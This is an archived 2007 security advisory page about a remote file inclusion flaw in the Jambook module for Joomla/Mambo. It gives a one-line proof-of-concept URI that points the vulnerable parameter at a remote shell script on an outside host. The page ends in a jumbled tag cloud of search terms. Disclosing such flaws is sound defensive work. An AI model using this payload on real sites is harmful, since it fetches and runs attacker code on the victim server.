about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , RETIRED: Joomla/Mambo Jambook Module MosConfig_Absolute_Path Remote File Include Vulnerability


Title RETIRED: Joomla/Mambo Jambook Module MosConfig_Absolute_Path Remote File Include Vulnerability
Published 2007-04-16-12:00AM
Updated 2007-04-17-05:51PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  Cr@zy_King is credited with the discovery of this vulnerability.
Vulnerable  Jambook Jambook 1.0 beta7
Not Vulnerable  
Code   Attackers can use a browser to exploit these issues.

The following proof-of-concept URI is available:

http://www.example.com/components/com_Jambook/jambook.php?mosConfig_absolute_path=http://shell.com/shell.txt?
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sat, 21 Nov 2009 00:45:01 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
PHP 4.4.2 Sexyworld senaga cilia croz a.sebang45 Zeroboard- 200 /compo Sex.waalpa CMS is Fre Morai phpbb sql kushbu blog.sina. Jayamalini news for c www.dzpk.o news for c indonesia HINDI MOV ubuntu+ber www.segou1 Mujeres de joomla rem blogbugs.r sajtzaupoz a.qvod123. www.shuang Www.sex300 news for c wwwsaxe.co www.010jdn apache tom remote ker TAMILSEX.C wwwsaxe.co 2101 4image Mulher pel a5.selunta 200 /compo www.world www.x-zhan 2.6.21 exp indean sax MyWebServe magic.galr free-zz.cn cat+%252Fe news for c www.mobo.c